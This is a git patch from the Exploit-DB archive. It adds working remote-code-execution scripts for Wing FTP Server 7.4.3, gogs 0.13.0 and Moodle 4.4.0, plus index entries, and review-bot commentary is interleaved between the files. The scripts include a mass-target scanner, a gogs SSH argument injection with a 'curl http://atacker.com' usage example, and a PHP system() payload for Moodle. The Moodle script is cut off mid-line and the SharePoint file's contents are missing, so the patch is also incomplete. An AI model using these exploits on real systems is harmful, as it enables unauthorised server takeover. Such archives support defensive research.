From 83f6bce1ba1b5d4ef669fc9c5434c577d05b3ea4 Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Thu, 3 Jul 2025 00:16:29 +0000
Subject: [PATCH] DB: 2025-07-03
5 changes to exploits/shellcodes/ghdb
gogs 0.13.0 - Remote Code Execution (RCE)
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
Moodle 4.4.0 - Authenticated Remote Code Execution
Microsoft SharePoint 2019 - NTLM Authentication
---
exploits/multiple/remote/52347.py | 179 ++++++++++++++++++++
exploits/multiple/remote/52348.py | 194 +++++++++++++++++++++
exploits/multiple/webapps/52350.py | 262 +++++++++++++++++++++++++++++
exploits/windows/remote/52349.txt | 57 +++++++
files_exploits.csv | 4 +
5 files changed, 696 insertions(+)
create mode 100755 exploits/multiple/remote/52347.py
create mode 100755 exploits/multiple/remote/52348.py
create mode 100755 exploits/multiple/webapps/52350.py
create mode 100644 exploits/windows/remote/52349.txt
diff --git a/exploits/multiple/remote/52347.py b/exploits/multiple/remote/52347.py
new file mode 100755
index 000000000..696922f75
--- /dev/null
+++ b/exploits/multiple/remote/52347.py
@@ -0,0 +1,179 @@ +# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) +# CVE: CVE-2025-47812 +# Date: 2025-06-30 +# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r) +# Vendor Homepage: https://www.wftpserver.com/ +# Version: Wing FTP Server <= 7.4.3 +# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges) + +# Description: +# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) +# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username' +# parameter during login, leading to Lua code injection into session files. These maliciously crafted +# session files are subsequently executed when authenticated functionalities (e.g., /dir.html) are accessed, +# resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows). +# The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL) +# and the session creation logic (which uses the full unsanitized username). + +# Proof-of-Concept (Python): +# The provided Python script automates the exploitation process. +# It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html. +# Upon successful authentication (even anonymous), a UID cookie is returned. +# A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code, +# leading to RCE. 
+ + +import requests +import re +import argparse + +# ANSI color codes +RED = "\033[91m" +GREEN = "\033[92m" +RESET = "\033[0m" + +def print_green(text): + print(f"{GREEN}{text}{RESET}") + +def print_red(text): + print(f"{RED}{text}{RESET}") + +def run_exploit(target_url, command, username="anonymous", verbose=False): + login_url = f"{target_url}/loginok.html" + + login_headers = { + "Host": target_url.split('//')[1].split('/')[0], + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": target_url, + "Connection": "keep-alive", + "Referer": f"{target_url}/login.html?lang=english", + "Cookie": "client_lang=english", + "Upgrade-Insecure-Requests": "1", + "Priority": "u=0, i" + } + + + from urllib.parse import quote + encoded_username = quote(username) + + payload = ( + f"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\"{command}\")%0dlocal+r+%3d+h%3aread(\"*a\")" + "%0dh%3aclose()%0dprint(r)%0d--&password=" + ) + + if verbose: + print_green(f"[+] Sending POST request to {login_url} with command: '{command}' and username: '{username}'") + + try: + login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10) + login_response.raise_for_status() + except requests.exceptions.RequestException as e: + print_red(f"[-] Error sending POST request to {login_url}: {e}") + return False + + set_cookie = login_response.headers.get("Set-Cookie", "") + match = re.search(r'UID=([^;]+)', set_cookie) + + if not match: + print_red("[-] UID not found in Set-Cookie. 
Exploit might have failed or response format changed.") + return False + + uid = match.group(1) + if verbose: + print_green(f"[+] UID extracted: {uid}") + + dir_url = f"{target_url}/dir.html" + dir_headers = { + "Host": login_headers["Host"], + "User-Agent": login_headers["User-Agent"], + "Accept": login_headers["Accept"], + "Accept-Language": login_headers["Accept-Language"], + "Accept-Encoding": login_headers["Accept-Encoding"], + "Connection": "keep-alive", + "Cookie": f"UID={uid}", + "Upgrade-Insecure-Requests": "1", + "Priority": "u=0, i" + } + + if verbose: + print_green(f"[+] Sending GET request to {dir_url} with UID: {uid}") + + try: + dir_response = requests.get(dir_url, headers=dir_headers, timeout=10) + dir_response.raise_for_status() + except requests.exceptions.RequestException as e: + print_red(f"[-] Error sending GET request to {dir_url}: {e}") + return False + + body = dir_response.text + clean_output = re.split(r'<\?xml', body)[0].strip() + + if verbose: + print_green("\n--- Command Output ---") + print(clean_output) + print_green("----------------------") + else: + if clean_output: + print_green(f"[+] {target_url} is vulnerable!") + else: + print_red(f"[-] {target_url} is NOT vulnerable.") + + return bool(clean_output) + +def main(): + parser = argparse.ArgumentParser(description="Exploit script for command injection via login.html.") + parser.add_argument("-u", "--url", type=str, + help="Target URL (e.g., http://192.168.134.130). Required if -f not specified.") + parser.add_argument("-f", "--file", type=str, + help="File containing list of target URLs (one per line).") + parser.add_argument("-c", "--command", type=str, + help="Custom command to execute. Default: whoami. If specified, verbose output is enabled automatically.") + parser.add_argument("-v", "--verbose", action="store_true", + help="Show full command output (verbose mode). 
Ignored if -c is used since verbose is auto-enabled.") + parser.add_argument("-o", "--output", type=str, + help="File to save vulnerable URLs.") + parser.add_argument("-U", "--username", type=str, default="anonymous", + help="Username to use in the exploit payload. Default: anonymous") + + args = parser.parse_args() + + if not args.url and not args.file: + parser.error("Either -u/--url or -f/--file must be specified.") + + command_to_use = args.command if args.command else "whoami" + verbose_mode = True if args.command else args.verbose + + vulnerable_sites = [] + + targets = [] + if args.file: + try: + with open(args.file, 'r') as f: + targets = [line.strip() for line in f if line.strip()] + except Exception as e: + print_red(f"[-] Could not read target file '{args.file}': {e}") + return + else: + targets = [args.url] + + for target in targets: + print(f"\n[*] Testing target: {target}") + is_vulnerable = run_exploit(target, command_to_use, username=args.username, verbose=verbose_mode) + if is_vulnerable: + vulnerable_sites.append(target) + + if args.output and vulnerable_sites: + try: + with open(args.output, 'w') as out_file: + for site in vulnerable_sites: + out_file.write(site + "\n") + print_green(f"\n[+] Vulnerable sites saved to: {args.output}") + except Exception as e: + print_red(f"[-] Could not write to output file '{args.output}': {e}") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52348.py b/exploits/multiple/remote/52348.py new file mode 100755 index 000000000..ede3e5daf --- /dev/null +++ b/exploits/multiple/remote/52348.py 
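Review bot: The header comment of 52347.py explains how the flaw is triggered but gives a defender nothing to act on, although the description already holds the facts needed. I would add `# Mitigation: upgrade to Wing FTP Server 7.4.4 or later` and `# Detection: an encoded NULL byte (%00) in the username field of a POST to /loginok.html`. The non-verbose verdict at the end of `run_exploit` rests on `bool(clean_output)`, so any non-empty text before `<?xml` (possibly an HTML error or login page) is reported and written to the `-o` file as vulnerable; treat that result as inconclusive when validating a patch. The argparse description says "command injection via login.html" while the code posts to `loginok.html` and the header describes Lua injection, so the description should be reworded to match.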
@@ -0,0 +1,194 @@ +# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE) +# Date: 27th June, 2025 +# Exploit Author: Ardayfio Samuel Nii Aryee +# Software link: https://github.com/gogs/gogs.git +# Version: gogs <=0.13.0 +# Tested on: Ubuntu +# CVE: CVE-2024-39930 + + +# =============================== +# Example Usage: +# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned" +# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222 +# =============================== + +import requests +import paramiko +import base64 +import random +import string +import sys +import argparse +from urllib.parse import urlparse + +API_BASE_URL = "" + +def generate_random_string(length=8, charset=None): + if charset is None: + charset = string.ascii_letters + string.digits + return ''.join(random.choices(charset, k=length)) + +def make_headers(token=None, basic_auth=None): + headers = {"Content-Type": "application/json"} + if token: + headers["Authorization"] = f"token {token}" + elif basic_auth: + b64 = base64.b64encode(basic_auth.encode()).decode() + headers["Authorization"] = f"Basic {b64}" + return headers + +def http_post(path, json=None, headers=None): + url = f"{API_BASE_URL}{path}" + response = requests.post(url, json=json, headers=headers) + response.raise_for_status() + return response + +def http_get(path, headers=None): + url = f"{API_BASE_URL}{path}" + response = requests.get(url, headers=headers) + response.raise_for_status() + return response + +def http_delete(path, headers=None): + url = f"{API_BASE_URL}{path}" + response = requests.delete(url, headers=headers) + response.raise_for_status() + return response + +def obtain_api_token(username, password): + auth = f"{username}:{password}" + headers = make_headers(basic_auth=auth) + data = {"name": generate_random_string()} + + try: + response = http_post(f"/users/{username}/tokens", 
json=data, headers=headers) + token = response.json()['sha1'] + print(f"[+] API Token Acquired: {token}") + return token + except Exception as e: + print(f"[!] Failed to obtain API token: {e}") + sys.exit(1) + +def create_repo(token): + repo_name = generate_random_string() + headers = make_headers(token=token) + data = { + "name": repo_name, + "description": "Auto-created repository", + "private": False + } + + try: + response = http_post("/user/repos", json=data, headers=headers) + full_name = response.json()['full_name'] + print(f"[+] Repository Created: {full_name}") + return full_name + except Exception as e: + print(f"[!] Failed to create repository: {e}") + sys.exit(1) + +def delete_existing_ssh_keys(token): + headers = make_headers(token=token) + try: + response = http_get("/user/keys", headers=headers) + keys = response.json() + for key in keys: + key_id = key['id'] + http_delete(f"/user/keys/{key_id}", headers=headers) + print(f"[+] Deleted SSH Key ID: {key_id}") + except Exception as e: + print(f"[!] Failed to delete existing SSH keys: {e}") + sys.exit(1) + +def add_ssh_key(public_key_path, token): + delete_existing_ssh_keys(token) + + try: + with open(public_key_path, 'r') as f: + key = f.read() + except Exception as e: + print(f"[!] Failed to read public key file: {e}") + sys.exit(1) + + headers = make_headers(token=token) + data = { + "title": generate_random_string(), + "key": key + } + + try: + response = http_post("/user/keys", json=data, headers=headers) + print(f"[+] SSH Key Added: {response.status_code}") + except Exception as e: + print(f"[!] Failed to add SSH key: {e}") + sys.exit(1) + +def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command): + try: + key = paramiko.RSAKey.from_private_key_file(private_key_path) + except Exception as e: + print(f"[!] 
Failed to load SSH key: {e}") + sys.exit(1) + + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key) + + session = client.get_transport().open_session() + + print("[+] Executing command...... ") + session.set_environment_variable("--split-string", command) + session.exec_command(f"git-upload-pack {repo_path}") + + stdout = session.makefile('rb', 1024) + stderr = session.makefile_stderr('rb', 1024) + + print("STDERR:", stderr.read().decode()) + print("STDOUT:", stdout.read().decode()) + + session.close() + client.close() + except Exception as e: + print(f"[!] Error: {e}") + sys.exit(1) + +def main(): + global API_BASE_URL + + parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)") + parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)") + parser.add_argument("auth", help="Gogs credentials in the format username:password") + parser.add_argument("private_key", help="Path to private SSH key") + parser.add_argument("public_key", help="Path to public SSH key") + parser.add_argument("command", help="Command to execute remotely") + parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use") + args = parser.parse_args() + + parsed_url = urlparse(args.url) + API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1" + ssh_host = parsed_url.hostname + ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22) + + try: + username, password = args.auth.split(":") + except ValueError: + print("[!] 
Invalid format for auth argument") + sys.exit(1) + + token = obtain_api_token(username, password) + repo_path = create_repo(token) + add_ssh_key(args.public_key, token) + + exploit( + ssh_user=username, + ssh_host=ssh_host, + ssh_port=ssh_port, + private_key_path=args.private_key, + repo_path=repo_path, + command=args.command + ) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52350.py b/exploits/multiple/webapps/52350.py new file mode 100755 index 000000000..ec0b463ca --- /dev/null +++ b/exploits/multiple/webapps/52350.py 
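Review bot: `add_ssh_key` calls `delete_existing_ssh_keys(token)` first, which removes every SSH key registered on the supplied account, and neither the usage block nor the argparse help says so. The API token from `obtain_api_token` and the public repository from `create_repo` are also left behind, so a lab account ends up altered in three ways with no cleanup. I would document this at the top of the file, e.g. `# NOTE: deletes all SSH keys on the account; the created token and repository are not removed`. For defenders, the visible trigger in `exploit()` is the SSH environment request named `--split-string` sent before `git-upload-pack`, which is worth recording in the header as `# Detection: SSH env requests whose variable name begins with '-'`.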
@@ -0,0 +1,262 @@ +# Exploit Title: Moodle 4.4.0 - Authenticated Remote Code Execution +# Exploit Author: Likhith Appalaneni +# Vendor Homepage: https://moodle.org +# Software Link: https://github.com/moodle/moodle/releases/tag/v4.4.0 +# Tested Version: Moodle 4.4.0 +# Affected versions: 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11 +# Tested On: Ubuntu 22.04, Apache2, PHP 8.2 +# CVE: CVE-2024-43425 +# References: +# - https://github.com/aninfosec/CVE-2024-43425-Poc +# - https://nvd.nist.gov/vuln/detail/CVE-2024-43425 + +import argparse +import requests +import re +import sys +import subprocess +from bs4 import BeautifulSoup +import urllib.parse + +requests.packages.urllib3.disable_warnings() + +def get_login_token(session, login_url): + print("[*] Step 1: GET /login/index.php to extract login token") + try: + response = session.get(login_url, verify=False) + if response.status_code != 200: + print(f"[-] Unexpected status code {response.status_code} when accessing login page") + sys.exit(1) + except Exception as e: + print(f"[-] Error connecting to {login_url}: {e}") + sys.exit(1) + + soup = BeautifulSoup(response.text, "html.parser") + token_input = soup.find("input", {"name": "logintoken"}) + if not token_input or not token_input.get("value"): + print("[-] Failed to extract login token from HTML") + sys.exit(1) + + token = token_input["value"] + print(f"[+] Found login token: {token}") + return token + +def perform_login(session, login_url, username, password, token): + print("[*] Step 2: POST /login/index.php with credentials") + login_payload = { + "anchor": "", + "logintoken": token, + "username": username, + "password": password, + } + try: + response = session.post( + login_url, + data=login_payload, + headers={"Content-Type": "application/x-www-form-urlencoded"}, + verify=False, + ) + if response.status_code not in [200, 303]: + print(f"[-] Unexpected response code during login: {response.status_code}") + sys.exit(1) + except Exception as e: + 
print(f"[-] Login POST failed: {e}") + sys.exit(1) + + if "MoodleSession" not in session.cookies.get_dict(): + print("[-] Login may have failed: MoodleSession cookie missing") + sys.exit(1) + + print("[+] Logged in successfully.") + +def get_quiz_info(session, base_url, cmid): + print("[*] Extracting sesskey, courseContextId, and category from quiz edit page...") + quiz_edit_url = f"{base_url}/mod/quiz/edit.php?cmid={cmid}" + try: + resp = session.get(quiz_edit_url, verify=False) + if resp.status_code != 200: + print(f"[-] Failed to load quiz edit page. Status: {resp.status_code}") + sys.exit(1) + # Extract sesskey + sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', resp.text) + # Extract courseContextId + ctxid_match = re.search(r'"courseContextId":(\d+)', resp.text) + # Extract category + category_match = re.search(r';category=(\d+)', resp.text) + if not (sesskey_match and ctxid_match and category_match): + print("[-] Could not extract sesskey, courseContextId, or category") + print(resp.text[:1000]) + sys.exit(1) + sesskey = sesskey_match.group(1) + ctxid = ctxid_match.group(1) + category = category_match.group(1) + print(f"[+] Found sesskey: {sesskey}") + print(f"[+] Found courseContextId: {ctxid}") + print(f"[+] Found category: {category}") + return sesskey, ctxid, category + except Exception as e: + print(f"[-] Exception while extracting quiz info: {e}") + sys.exit(1) + +def upload_calculated_question(session, base_url, sesskey, cmid, courseid, category, ctxid): + print("[*] Step 3: Uploading calculated question with payload...") + url = f"{base_url}/question/bank/editquestion/question.php" + payload = "(1)->{system($_GET[chr(97)])}" + post_data = { + "initialcategory": 1, + "reload": 1, + "shuffleanswers": 1, + "answernumbering": "abc", + "mform_isexpanded_id_answerhdr": 1, + "noanswers": 1, + "nounits": 1, + "numhints": 2, + "synchronize": "", + "wizard": "datasetdefinitions", + "id": "", + "inpopup": 0, + "cmid": cmid, + "courseid": courseid, + 
"returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", + "mdlscrollto": 0, + "appendqnumstring": "addquestion", + "qtype": "calculated", + "makecopy": 0, + "sesskey": sesskey, + "_qf__qtype_calculated_edit_form": 1, + "mform_isexpanded_id_generalheader": 1, + "category": f"{category},{ctxid}", + "name": "exploit", + "questiontext[text]": "

test

", + "questiontext[format]": 1, + "questiontext[itemid]": 623548580, + "status": "ready", + "defaultmark": 1, + "generalfeedback[text]": "", + "generalfeedback[format]": 1, + "generalfeedback[itemid]": 21978947, + "answer[0]": payload, + "fraction[0]": 1.0, + "tolerance[0]": 0.01, + "tolerancetype[0]": 1, + "correctanswerlength[0]": 2, + "correctanswerformat[0]": 1, + "feedback[0][text]": "", + "feedback[0][format]": 1, + "feedback[0][itemid]": 281384971, + "unitrole": 3, + "penalty": 0.3333333, + "hint[0][text]": "", + "hint[0][format]": 1, + "hint[0][itemid]": 812786292, + "hint[1][text]": "", + "hint[1][format]": 1, + "hint[1][itemid]": 795720000, + "tags": "_qf__force_multiselect_submission", + "submitbutton": "Save changes" + } + try: + res = session.post(url, data=post_data, verify=False, allow_redirects=False) + if res.status_code in [302, 303] and "Location" in res.headers and "&id=" in res.headers["Location"]: + print("[+] Question upload request sent. Extracting question ID from redirect.") + qid = re.search(r"&id=(\d+)", res.headers["Location"]) + if not qid: + print("[-] Could not extract question ID from redirect.") + sys.exit(1) + return qid.group(1) + else: + print(f"[-] Upload failed. 
Status code: {res.status_code}") + sys.exit(1) + except Exception as e: + print(f"[-] Upload exception: {e}") + sys.exit(1) + +def post_dataset_wizard(session, base_url, question_id, sesskey, cmid, courseid, category, ctxid): + print("[*] Step 4: Completing dataset wizard with dataset[0]=0") + wizard_url = f"{base_url}/question/bank/editquestion/question.php?wizardnow=datasetdefinitions" + data_payload = { + "id": question_id, + "inpopup": 0, + "cmid": cmid, + "courseid": courseid, + "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", + "mdlscrollto": 0, + "appendqnumstring": "addquestion", + "category": f"{category},{ctxid}", + "wizard": "datasetitems", + "sesskey": sesskey, + "_qf__question_dataset_dependent_definitions_form": 1, + "dataset[0]": 0, + "synchronize": 0, + "submitbutton": "Next page" + } + try: + res = session.post(wizard_url, data=data_payload, verify=False) + if res.status_code == 200: + print("[+] Dataset wizard POST submitted.") + return False + elif "Exception - system(): Argument #1 ($command) cannot be empty" in res.text: + print("[+] Reached expected error page. Payload is being interpreted.") + return True + else: + print(f"[-] Dataset wizard POST failed with status: {res.status_code}") + return False + except Exception as e: + print(f"[-] Exception during dataset wizard step: {e}") + return False + +def trigger_rce(session, base_url, question_id, category, cmid, courseid, cmd): + print("[*] Step 5: Triggering command: {cmd}") + encoded = urllib.parse.quote(cmd) + trigger_url = ( + f"{base_url}/question/bank/editquestion/question.php?id={question_id}" + f"&category={category}&cmid={cmid}&courseid={courseid}" + f"&wizardnow=datasetitems&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D{cmid}%26addonpage%3D0" + f"&appendqnumstring=addquestion&mdlscrollto=0&a={encoded}" + ) + try: + resp = session.get(trigger_url, verify=False) + print("[+] Trigger request sent. 
Output below:\n") + lines = resp.text.splitlines() + output_lines = [] + for line in lines: + if " \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 098b514d1..1cc6a1f9c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
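Review bot: Every request in 52350.py is sent with `verify=False`, and `requests.packages.urllib3.disable_warnings()` silences the warning, so `perform_login` posts the username and password over a connection whose certificate is never checked. Verification should be the default: drop the per-call `verify=False` and set `session.verify` once from an explicit opt-out (a hypothetical `--insecure` flag; the argument parser is not visible in this view). In `trigger_rce` the line `print("[*] Step 5: Triggering command: {cmd}")` lacks the `f` prefix and prints the braces literally; it should be `print(f"[*] Step 5: Triggering command: {cmd}")`. The script also prints the login token and `sesskey` to stdout, which leaves live session secrets in terminal logs. The rest of `trigger_rce` and the entry point are cut off in this view, so nothing past that point was reviewed.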
@@ -10988,6 +10988,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21295,exploits/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",remote,multiple,,2002-02-19,2012-09-12,1,CVE-2002-0300;OSVDB-5323,,,,,https://www.securityfocus.com/bid/4125/info 47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,,2019-09-30,2019-09-30,0,CVE-2019-16645,,,,, 43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,,2018-01-24,2018-01-25,1,CVE-2017-17562,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/aae77fc1a47149d43747ad9513e6f778553ab82c/modules/exploits/linux/http/goahead_ldpreload.rb +52348,exploits/multiple/remote/52348.py,"gogs 0.13.0 - Remote Code Execution (RCE)",2025-07-02,cybersploit,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2024-39930,,,,, 33064,exploits/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,remote,multiple,,2009-06-03,2014-04-28,1,CVE-2009-2352;OSVDB-56478,,,,,https://www.securityfocus.com/bid/35572/info 33123,exploits/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing",2009-06-28,Lostmon,remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35839/info 33124,exploits/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35841/info 
@@ -11686,6 +11687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple,,2004-12-14,2016-04-19,1,,,,,http://www.exploit-db.comwget-1.9.tar.gz, 31106,exploits/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Remote Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",remote,multiple,,2008-02-04,2014-01-28,1,CVE-2008-5159;OSVDB-42861,,,,,https://www.securityfocus.com/bid/27614/info 33067,exploits/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",remote,multiple,,2009-06-08,2014-05-01,1,CVE-2009-2386;OSVDB-55863,,,,,https://www.securityfocus.com/bid/35595/info +52347,exploits/multiple/remote/52347.py,"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)",2025-07-02,4m3rr0r,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2025-47812,,,,, 16292,exploits/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,remote,multiple,,2010-11-24,2011-07-15,1,CVE-2010-0304;OSVDB-61987,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.2.0.zip, 31941,exploits/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",remote,multiple,,2008-06-20,2014-02-27,1,CVE-2008-2889;OSVDB-46537,,,,,https://www.securityfocus.com/bid/29844/info 19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info 
@@ -12199,6 +12201,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,, 49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,,2021-02-23,2021-02-23,0,CVE-2021-27370,,,,, +52350,exploits/multiple/webapps/52350.py,"Moodle 4.4.0 - Authenticated Remote Code Execution",2025-07-02,"Likhith Appalaneni",webapps,multiple,,2025-07-02,2025-07-02,0,CVE-2024-43425,,,,, 51499,exploits/multiple/webapps/51499.txt,"MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)",2023-05-31,tmrswrr,webapps,multiple,,2023-05-31,2023-05-31,0,,,,,, 50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",2021-11-12,"Shain Lakin",webapps,multiple,,2021-11-12,2021-11-12,0,,,,,, 9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple,,2009-10-28,,1,OSVDB-59579,,,,, 
@@ -44572,6 +44575,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16373,exploits/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,remote,windows,,2010-08-25,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,, 16369,exploits/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,, 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,,2020-02-11,2020-02-11,0,CVE-2019-0604,,,,, +52349,exploits/windows/remote/52349.txt,"Microsoft SharePoint 2019 - NTLM Authentication",2025-07-02,nu11secur1ty,remote,windows,,2025-07-02,2025-07-02,0,CVE-2025-47166,,,,, 31632,exploits/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,remote,windows,,2008-04-09,2014-02-13,1,CVE-2008-1888;OSVDB-44459,,,,,https://www.securityfocus.com/bid/28706/info 29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,remote,windows,,2007-05-04,2013-12-01,1,CVE-2007-2581,,,,,https://www.securityfocus.com/bid/23832/info 20305,exploits/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,remote,windows,,1999-01-30,2012-08-07,1,CVE-1999-0360;OSVDB-5884,,,,,https://www.securityfocus.com/bid/1811/info